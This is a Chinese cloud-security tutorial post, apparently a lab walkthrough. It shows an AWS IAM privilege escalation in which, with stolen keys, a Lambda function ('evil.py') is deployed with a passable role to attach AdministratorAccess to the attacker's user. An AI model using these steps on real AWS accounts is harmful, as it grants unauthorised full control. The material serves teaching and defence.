AWS云安全系列 9 - IAM-Lambda

admin 2025年2月15日23:29:10评论3 views字数 1441阅读4分48秒阅读模式

国内云安全培训请点击原文或访问以下链接

https://www.yuque.com/u8047536/supvqp/ri4ft0

前提是已经获取了相关的密钥

步骤 1:将 AWS CLI配置为访问凭证

AWS云安全系列 9 - IAM-Lambda

步骤 2:列出附加到用户的AWS 托管策略

aws iam list-attached-user-policies --user-name xxx aws iam list-user-policies --user-name xx

AWS云安全系列 9 - IAM-Lambda

AWS云安全系列 9 - IAM-Lambda

步骤 3:尝试在AWS账户上创建用户

aws iam create-user --user-name Bob

AWS云安全系列 9 - IAM-Lambda

 由于权限不足,用户创建失败

步骤 4: 查看策略权限和详细信息

aws iam get-user-policy --user-name xx --policy-name terraform-20210211103351240800000003

AWS云安全系列 9 - IAM-Lambda

步骤 5:列出 AWS 账户上可以传递给 Lambda 的角色

aws iam list roles

AWS云安全系列 9 - IAM-Lambda

步骤 6:查看 lab11lambdaiam角色详细信息

aws iam get-role --role-name lab11lambdaiamaws iam list-role-policies --role-name lab11lambdaiamaws iam get-role-policy --role-name lab11lambdaiam --policy-name terraform-20210212050404291100000002

AWS云安全系列 9 - IAM-Lambda

AWS云安全系列 9 - IAM-Lambda

AWS云安全系列 9 - IAM-Lambda

步骤 7:创建包含以下内容的 python 脚本

Python Script: evil.py

import boto3def handler(event, context): iam = boto3.client("iam")response = iam.attach_user_policy(UserName="student", PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess")return response

AWS云安全系列 9 - IAM-Lambda

步骤8:使用zip压缩  python脚本

zip evil-function.zip evil.py

AWS云安全系列 9 - IAM-Lambda

步骤 9:在 AWS 账户上创建  lambda函数

aws lambda create-function --function-name evil-function --runtime python3.8 --zip-file fileb://evil-function.zip --handler evil.handler --role arn:aws:iam::6xxxxxxxxx1:role/lab11lambdaiam

AWS云安全系列 9 - IAM-Lambda

步骤 10:调用新创建的Lambda 函数

 aws lambda invoke --function-name evil-function invoke_out.txt

AWS云安全系列 9 - IAM-Lambda

步骤 11:检查xx用户的附加策略

aws iam list-attached-user-policies --user-name xx

AWS云安全系列 9 - IAM-Lambda

已成功将管理员访问策略(AdministratorAccess附加到xx用户

步骤 12:尝试 在AWS账户上创建新用户

●  aws iam create-user --user-name Bob

AWS云安全系列 9 - IAM-Lambda

已成功执行特权操作.

References:

1.AWSCLI(https://docs.aws.amazon.com/cli/latest/reference/)

原文始发于微信公众号(关注安全技术):AWS云安全系列 9 - IAM-Lambda

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月15日23:29:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   AWS云安全系列 9 - IAM-Lambdahttps://cn-sec.com/archives/941258.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息